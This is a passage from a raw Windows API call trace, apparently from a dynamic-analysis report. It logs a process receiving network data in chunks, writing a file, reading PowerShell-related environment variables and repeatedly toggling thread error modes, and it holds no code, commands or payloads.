lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.356] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.357] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.357] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.358] CoTaskMemFree (pv=0x2386d738460) [0197.358] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.358] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.358] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.436] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.436] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.436] CoTaskMemFree (pv=0x2386d738460) [0197.436] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.437] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.437] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.524] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.524] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.525] CoTaskMemFree (pv=0x2386d738460) [0197.525] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.601] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.601] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.602] CoTaskMemFree (pv=0x2386d738460) [0197.602] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.602] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.602] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.684] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.685] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.685] CoTaskMemFree (pv=0x2386d738460) [0197.685] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.763] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.763] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.763] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.764] CoTaskMemFree (pv=0x2386d738460) [0197.764] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.765] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.765] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.844] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.844] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.845] CoTaskMemFree (pv=0x2386d738460) [0197.845] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.935] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.935] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.936] CoTaskMemFree (pv=0x2386d738460) [0197.936] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.016] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.018] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.018] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.018] CoTaskMemFree (pv=0x2386d738460) [0198.018] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.019] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.019] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.209] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.210] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.210] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.211] CoTaskMemFree (pv=0x2386d738460) [0198.211] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.211] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.212] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.287] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.287] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.288] CoTaskMemFree (pv=0x2386d738460) [0198.288] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.288] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.289] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.364] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.365] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.365] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.366] CoTaskMemFree (pv=0x2386d738460) [0198.366] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.442] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.442] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.442] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.443] CoTaskMemFree (pv=0x2386d738460) [0198.443] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.531] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.531] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.532] CoTaskMemFree (pv=0x2386d738460) [0198.532] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0198.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.616] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.616] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.617] CoTaskMemFree (pv=0x2386d738460) [0198.617] recv (in: s=0x7fc, buf=0x238005544f8, len=4071, flags=0 | out: buf=0x238005544f8*) returned 4071 [0198.620] SetEvent (hEvent=0x6f4) returned 1 [0198.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.707] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.707] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0198.708] CoTaskMemFree (pv=0x2386d738460) [0198.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0198.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1b8 | out: lpConsoleScreenBufferInfo=0xafa508e1b8) returned 1 [0198.710] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0198.710] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e050 | out: lpWriteRegion=0xafa508e050) returned 1 [0198.710] CoTaskMemFree (pv=0x2386d738460) [0198.710] WriteFile (in: hFile=0x710, lpBuffer=0x2380055c468*, nNumberOfBytesToWrite=0xfe7, lpNumberOfBytesWritten=0xafa508e3b8, lpOverlapped=0x0 | out: lpBuffer=0x2380055c468*, lpNumberOfBytesWritten=0xafa508e3b8*=0xfe7, lpOverlapped=0x0) returned 1 [0198.713] EtwEventActivityIdControl () returned 0x0 [0198.717] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705ec0 [0198.718] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d705ec0, nSize=0x105 | out: lpBuffer="") returned 0x24 [0198.718] CoTaskMemFree (pv=0x2386d705ec0) [0198.718] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0198.718] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x24 [0198.718] CoTaskMemFree (pv=0x2386d706fc0) [0198.718] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0198.718] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0198.718] CoTaskMemFree (pv=0x2386d703cc0) [0198.718] CoTaskMemAlloc (cb=0x20e) returned 0x2386d702340 [0198.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2386d702340, nSize=0x105 | out: lpBuffer="") returned 0x3a [0198.718] CoTaskMemFree (pv=0x2386d702340) [0198.718] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705860 [0198.719] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2386d705860, nSize=0x105 | out: lpBuffer="") returned 0x3a [0198.719] CoTaskMemFree (pv=0x2386d705860) [0198.719] CoTaskMemAlloc (cb=0x20e) returned 0x2386d708d80 [0198.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2386d708d80, nSize=0x105 | out: lpBuffer="") returned 0x9c [0198.719] CoTaskMemFree (pv=0x2386d708d80) [0198.719] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706300 [0198.719] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2386d706300 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0198.719] CoTaskMemFree (pv=0x2386d706300) [0198.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e130) returned 1 [0198.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e140) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e100) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e190) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e190) returned 1 [0198.730] SetThreadErrorMode (dwNewMode=0x0, 